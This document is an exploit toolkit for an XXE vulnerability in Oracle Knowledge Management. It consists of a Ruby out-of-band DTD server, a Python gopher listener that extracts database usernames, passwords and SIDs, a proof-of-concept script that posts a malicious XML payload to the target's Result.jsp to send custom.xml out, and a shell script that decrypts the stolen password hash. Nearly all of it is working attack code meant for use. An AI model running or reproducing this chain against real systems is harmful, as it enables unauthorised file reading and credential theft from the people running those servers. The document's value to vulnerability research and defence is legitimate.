Oracle Knowledge Management XXE Leading to a RCE

                                                xxeserve.rb
#!/usr/bin/env ruby
# Notes:
# - This is the out of band xxe server that is used to retrieve the file and send it via the gopher protocol
# - ruby xxeserve.rb -o 0.0.0.0

require 'sinatra'

get "/" do
  return "OHAI" if params[:p].nil?
  f = File.open("./files/#{request.ip}#{Time.now.to_i}","w")
  f.write(params[:p])
  f.close
  ""
end

get "/xml" do
  return "" if params[:f].nil?

<<END  
<!ENTITY % payl SYSTEM "file:///#{params[:f]}">
<!ENTITY % int "<!ENTITY &#37; trick SYSTEM 'gopher://#{request.host}:1337/?%payl;'>">
END
end



gopher.py
#!/usr/bin/python
# Notes:
# - This code just listens for client requests on port 1337
# - it looks for database strings and prints them out

import socket
import sys
import re

# Create a TCP/IP socket
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

# Bind the socket to the port
server_address = ('0.0.0.0', 1337)
print >>sys.stderr, 'starting up on %s port %s' % server_address


sock.bind(server_address)
	
# Listen for incoming connections
sock.listen(1)

while True:
    # Wait for a connection
    print >>sys.stderr, 'waiting for a connection'
    connection, client_address = sock.accept()
    try:
        print >>sys.stderr, 'connection from', client_address

        # Receive the data in small chunks and retransmit it
        while True:
            data = connection.recv(2048)
            
            if data:
				#print data
				matchuser = re.search("<user>(.*)</user>", data)
				matchpassword = re.search("<password>(.*)</password>", data)
				matchurl = re.search("<url>(.*)</url>", data)
				if matchuser and matchpassword and matchurl:
					print "(+) The database SID is: %s" % matchurl.group(1)
					print "(+) The database username is: %s" % matchuser.group(1)
					print "(+) The database password is: %s" % matchpassword.group(1)
					connection.close()
					sys.exit(1)
				connection.close()
				sys.exit(1)
            else:
                print >>sys.stderr, 'no more data from', client_address
                break
            
    except Exception:
	    connection.close()
		
    finally:
        # Clean up the connection
        connection.close()
    
        
        
poc.py
#!/usr/bin/python
# Notes:
# - This code steals the C:/Oracle/Knowledge/IM/instances/InfoManager/custom.xml file via the XXE bug.
# - You need to run ruby xxeserve.rb -o 0.0.0.0 and use an interface ip for the "local xxe server"
# - The code requires a proxy server to be setup on 127.0.0.1:8080 although, this can be changed

import requests
import json
import sys

# burp, ftw
proxies = {
  "http": "http://127.0.0.1:8080",
}

if len(sys.argv) < 3:
	print "(+) Usage: %s [local xxe server:port] [target]" % sys.argv[0]
	print "(+) Example: %s 172.16.77.1:4567 172.16.77.128" % sys.argv[0]
	sys.exit(1)
	
localxxeserver = sys.argv[1]
target = sys.argv[2]

payload = {'method' : '2', 'inputXml': '''<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE root [
<!ENTITY %% remote SYSTEM "http://%s/xml?f=C:/Oracle/Knowledge/IM/instances/InfoManager/custom.xml">
%%remote;
%%int;
%%trick;]>''' % localxxeserver}

url = 'http://%s:8226/imws/Result.jsp' % target

headers = {'content-type': 'application/x-www-form-urlencoded'}
print "(+) pulling custom.xml for the db password..."
r = requests.post(url, data=payload, headers=headers, proxies=proxies)
if r.status_code == 200:
	print "(!) Success! please check the gopher.py window!"


decrypt.sh
#!/bin/sh
if [ "$#" -ne 1 ]; then
    echo "(!) Usage: $0 [hash]"
else
    java -classpath "infra_encryption.jar:oraclepki.jar:osdt_core.jar:osdt_cert.jar:commons-codec-1.3.jar" -DKEYSTORE_LOCATION="keystore" com.inquira.infra.security.OKResourceEncryption $1
fi